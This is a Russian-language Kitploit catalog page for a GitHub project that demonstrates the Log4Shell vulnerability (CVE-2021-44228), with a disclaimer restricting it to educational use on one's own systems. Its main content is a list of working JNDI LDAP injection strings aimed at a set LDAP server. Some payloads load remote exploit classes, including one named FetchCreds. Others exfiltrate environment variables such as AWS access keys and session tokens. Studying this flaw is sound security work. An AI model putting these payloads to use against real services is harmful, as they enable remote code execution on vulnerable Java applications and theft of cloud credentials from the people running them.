Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
log4shell — Образовательная демонстрация уязвимости Log4Shell (CVE-2021-44228) с JNDI LDAP-полезными нагрузками для экспериментального тестирования на ваших собственных системах. | Kitploit
Инструменты/GitHubGitHub/jxerome/log4shell
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеРазработка Полезной НагрузкиЛаборатории и Практика
GitHubjxerome/log4shell

log4shell

Образовательная демонстрация уязвимости Log4Shell (CVE-2021-44228) с JNDI LDAP-полезными нагрузками для экспериментального тестирования на ваших собственных системах.

Репозиторий
24 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Log4Shell

Этот проект является демонстрацией работы уязвимости безопасности log4shell.

Данная уязвимость описана в CVE-2021-44228.

Проект предназначен исключительно для образовательных целей. Его следует использовать только на собственной системе и только в экспериментальных целях.

Любое выполнение осуществляется на ваш собственный риск. Автор снимает с себя всякую ответственность за инциденты, возникшие в результате выполнения проекта.

Пример команд

root@kitploit:~
ldap_server=i-09cd4f41e5a2b1d66.eu-west-3.compute.internal:1389
hello '${jndi:ldap://'"${ldap_server}"'/run=log4shell.Exploit}'
hello '${jndi:ldap://'"${ldap_server}"'/run=log4shell.ExploitP,msg=my friend}'
hello '${jndi:ldap://'"${ldap_server}"'/run=log4shell.aws.FetchCreds}'
hello '${jndi:ldap://'"${ldap_server}"'/log=PATH:${env:USER}}'
hello '${jndi:ldap://'"${ldap_server}"'/log=PATH:${env:PATH}}'
hello '${jndi:ldap://'"${ldap_server}"'/log=os=${java:os}}'
hello '${jndi:ldap://'"${ldap_server}"'/log=aws_credentials,AWS_ACCESS_KEY_ID=${env:AWS_ACCESS_KEY_ID},AWS_SECRET_ACCESS_KEY=${env:AWS_SECRET_ACCESS_ID},AWS_SESSION_TOKEN=${env:AWS_SESSION_TOKEN}}'
Скачать инструмент